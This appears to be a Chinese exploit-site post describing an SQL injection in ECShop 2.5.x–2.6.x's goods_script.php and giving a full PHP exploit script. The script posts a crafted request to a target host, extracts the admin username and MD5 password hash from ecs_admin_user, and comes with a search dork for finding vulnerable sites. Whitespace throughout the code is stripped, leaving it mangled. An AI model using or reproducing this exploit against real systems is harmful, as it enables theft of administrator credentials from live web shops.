- 发布日期:2010-07.19 发布作者:Ryat 影响版本:ECShop2.5.x&2.6.x 官方地址:www.ecshop.com 漏洞描述:ECShop2.5.x&2.6.x goods_script.php 没有初始化SQL,导致注射漏洞
影响2.5.x和2.6.x,其他版本未测试
goods_script.php44行:injection/admincredentialsdisclosureexploit
if(emptyempty($_GET['type'])) { ... } elseif($_GET['type']=='collection') { ... } $sql.="LIMIT".(!emptyempty($_GET['goods_num'])?intval($_GET['goods_num']):10); $res=$db->query($sql);
$sql没有初始化,很明显的一个漏洞:)
EXP:
#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ ECShop<=v2.6.2SQLbypuret_t mail:puretotatgmaildotcom team:http://bbs.wolvez.org dork:"PoweredbyECShop"+---------------------------------------------------------------------------+ '); /** *workswithregister_globals=On */if($argc<3){ print_r(' +---------------------------------------------------------------------------+ Usage:php'.$argv[0].'hostpath host:targetserver(ip/hostname) path:pathtoecshop Example: php'.$argv[0].'localhost/ecshop/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time',0); $host=$argv[1]; $path=$argv[2]; $resp=send(); preg_match('#href="([\S]+):([a-z0-9]{32})"#',$resp,$hash); if($hash) exit("ExpoiltSuccess!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); elseexit("ExploitFailed!\n"); functionsend() { global$host,$path; $cmd='sql=SELECTCONCAT(user_name,0x3a,password)asgoods_idFROMecs_admin_userWHEREaction_list=0x'.bin2hex('all').'LIMIT1#'; $data="POST".$path."goods_script.php?type=".time()."HTTP/1.1\r\n"; $data.="Accept:*/*\r\n"; $data.="Accept-Language:zh-cn\r\n"; $data.="Content-Type:application/x-www-form-urlencoded\r\n"; $data.="User-Agent:Mozilla/4.0(compatible;MSIE6.00;WindowsNT5.1;SV1)\r\n"; $data.="Host:$host\r\n"; $data.="Content-Length:".strlen($cmd)."\r\n"; $data.="Connection:Close\r\n\r\n"; $data.=$cmd; $fp=fsockopen($host,80); fputs($fp,$data); $resp=''; while($fp&&!feof($fp)) $resp.=fread($fp,1024); return$resp; } ?>
标签分类: SQL注入 网站漏洞 0day 脚本漏洞
没有人会帮你一辈子,所以你要奋斗一生。
